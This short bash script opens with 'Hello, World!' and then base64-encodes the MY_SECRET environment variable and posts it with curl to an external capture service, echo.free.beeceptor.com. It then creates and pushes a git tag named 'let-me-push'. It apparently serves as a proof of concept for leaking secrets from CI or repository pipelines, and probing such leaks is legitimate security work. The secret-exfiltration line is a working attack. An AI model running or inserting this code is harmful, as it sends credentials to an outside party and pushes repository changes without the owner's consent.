#!/usr/bin/env bash

echo "Hello, World!"
my_secret=$(echo "$MY_SECRET" | base64)
curl -v -H "Content-Type: application/json" -d "{\"my_secret\": \"$my_secret\"}" http://echo.free.beeceptor.com/my-secret

git checkout main
git tag let-me-push
git push origin let-me-push
